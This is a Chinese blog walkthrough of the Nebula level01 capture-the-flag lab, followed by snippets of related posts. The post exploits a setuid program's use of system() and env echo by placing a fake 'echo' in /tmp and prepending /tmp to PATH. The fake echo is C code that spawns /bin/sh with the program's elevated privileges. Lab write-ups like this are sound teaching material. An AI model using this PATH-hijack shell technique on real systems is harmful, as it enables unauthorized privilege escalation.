Nebula level01

最新推荐文章于 2019-01-13 22:20:22 发布
最新推荐文章于 2019-01-13 22:20:22 发布
阅读量6.9k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/youfuchen/article/details/8160577
本文详细介绍了如何通过环境变量和系统调用实现从一个用户到另一个用户的权限转移,以获取特定用户(如flag01)的权限,并通过编译和执行特定的C语言程序来实现这一过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01 . Files for this level can be found in /home/flag01.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
	gid_t gid;
	uid_t uid;
	gid = getegid();
	uid = geteuid();

	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);

	system("/usr/bin/env echo and now what?");
}
使用level01用户名来编译运行(比如可执行程序为flag01)后添加用户名为flag01的可执行位,然后用level01的用户来运行程序,如何获取flag01的用户权限呢?其中有一个getflag的可执行程序,如果获取了对应的权限,那么运行这个getflag会打印出成功获取权限的信息。


首先得明白env这个命令是干什么的,env用来执行当前环境变量下的命令或者显示当前的环境变量。

echo是打印命令。

如果直接运行这个程序肯定会在终端上打印出来 and now what?

要想获得flag01的权限关键是利用system这个执行命令的系统调用。我们这个程序的可执行权限已经是flag01了,也就是它的euid用户是已经是flag01了。

因为echo已经是系统的内置命令了,所以我们无法改变echo的行为,开始时先export echo=getflag,或者别的一些都是不成功的,依然无法改变echo的行为。

因为每个用户在/tmp下面都是具有rwx权限的,所以我们可以在/tmp下面新建一个echo,然后export PATH=/tmp:$PATH, 这样的话执行起来会先去/tmp目录下查找echo这个可执行程序,如果存在则运行。

好的,下面在/tmp目录下新建一个文件test.c:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
      setuid(0);
      setgid(0);
      execl("/bin/sh","sh",(char *)0)
      return 0;
}
然后gcc -o echo test.c

好的,来到我们flag01的目录下运行./flag01, 发现返回了一个shell,输入命令whoami, 发现用户名变成了flag01,运行getflag发现oh,my God!

成功。



ExploitExercises_Nebula_Level01
小黑话不多
12-26 1429
题目源码如下: #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);
NebulaMarco宏编辑.rar
08-17
软件名称:Nebula宏编辑器 软件版本:ver1.00 软件性质:免费软件 软件用途:仅用于对Nebula模拟器的宏文件进行编辑。不可用于其它模拟器。
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
Nebula_level01
yuansunxue的专栏
01-28 402
http://www.kroosec.com/2012/10/nebula-level01.html In level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is p
i春秋 - Exploit-Exercises: Nebula - level01
无节操
02-25 2631
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?To do this level, log in as the level01 account with the password level01. Files for th
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1616
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
Nebula level00
无心插柳
08-28 7061
首先从nebula开始,nebula设置了19个levellevel00-level19,每一个level对应系统中的一个登陆账号,每一个level也对应home目录下的flag00-flag19这些账号。 一般来说如果你能用levelXX登陆,经过提权你的账号变成了flagXX,就表示你过关了。 下面会将每一个level的要求以及相关的代码列出来,我自己的解决办法和涉及到得知识点也会列出来
Nebula level04
无心插柳
11-08 7271
http://exploit-exercises.com/nebula/level04 This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :) To do this level, log
Nebula level10
无心插柳
05-13 7710
http://exploit-exercises.com/nebula/level10 About The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call. T
nebula 01
weicz的专栏
08-20 601
这一关是找出一个程序可以执行任意程序的漏洞 1#include 2#include 3#include 4#include 5#include 6 7int main(int argc, char **argv, char **envp) 8{ 9 gid_t gid; 10 uid_t uid; 11 gid = getegid(); 12 uid =
Exploit-Exercise之Nebula实践(四)
Yale的博客
01-13 557
获取15关卡的flag。 由题目的提示可知,这题需要用到strace,使用strace观察flag15的调用情况。 直接strace跟踪flag15 结果如下: 可以看到(图中受限于屏幕空间没有截全),flag15大量调用libc.so.6 再使用readelf查看 结果如下 可以看到程序对libc.so.6存在依赖,可题目没有提供。我们需要写libc.so.6到哪个路径,让.so...
Nebula模拟器-Nebula模拟器-Nebula模拟器
03-04
Nebula模拟器Nebula模拟器Nebula模拟器Nebula模拟器
Exploit-exercises
MillionSky的专栏
04-09 2174
1 概述Exploit-Exercise是一个Linux平台下漏洞挖掘、分析的练习平台。网址为:https://exploit-exercises.com官方提供了个很多虚拟机、文档、挑战题目,用于学习各种计算机安全问题,如权限提升、漏洞分析、Exploit开发、调试、逆向工程和通用的网络安全问题。 目前有几个板块:Nebula、Protostar、Fusion、Main Sequence、Clo...
i春秋 - Exploit-Exercises: Nebula - level03
无节操
02-25 2086
AboutCheck the home directory of flag03 and take note of the files there.There is a crontab that is called every couple of minutes.思路先进flag文件夹看看cd /home/flag03 vim writable.sh#!/bin/shfor i in /home/fl
Nebula
乘加减除
03-03 421
   官方网址:http://www.radonlabs.de/其他相关网址:http://sourceforge.net/projects/nebuladevicehttp://nebuladevice.cubik.org/《看看 Nebula2 吧》http://www.yanchen.com/article.asp?id=136《Nebula2 引擎评估 (3) —— 三月不
ExploitExercises_Nebula_Level03
小黑话不多
12-26 860
题目设置定时任务,定时执行/home/flag03/writable.sh脚本: #!/bin/sh for i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done 可以看到,该脚本去执行writable.d目录下的程序。 获取shell过程如下: 1.
i春秋 - Exploit-Exercises: Nebula - level05
无节操
02-25 1082
AboutCheck the flag05 home directory. You are looking for weak directory permissions Nebula官网思路进去看看cd /home/flag05/ ll发现一个其他人可执行的.backup目录cd .backup/ ll看到其他人可读的backup-19072011.tgz 复制到/tmp解压cp backup-
免考final linux提权与渗透入门——Exploit-Exercise Nebula学习与实践
weixin_30908103的博客
06-01 901
免考final linux提权与渗透入门——Exploit-Exercise Nebula学习与实践 0x0 前言 Exploit-Exercise是一系列学习linux下渗透的虚拟环境,官网是https://exploit-exercises.com/,通过它可以学习提权,漏洞利用,逆向等知识 我们这里尝试的是Nebula,是一个涵盖初级、中级挑战任务的练习环境,一个有20个关卡。涉及到的知识点...
Exploit-Exercise之Nebula实践(二)
Yale的博客
01-13 486
获取06关卡的flag。 06 题目提示flag06的密码来自传统的unix系统 这就意味这密文存储在/etc/psswd。我们直接读取 过滤一下 导出为cre.txt 接下来我们就需要破解该密文 我们在kali中破解 首先在kali上sftp连接nebula,将cre.txt下载到本机 在桌面就生成了cre.txt 在终端中首先切换到桌面,然后使用john破解 得到密码为hel...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值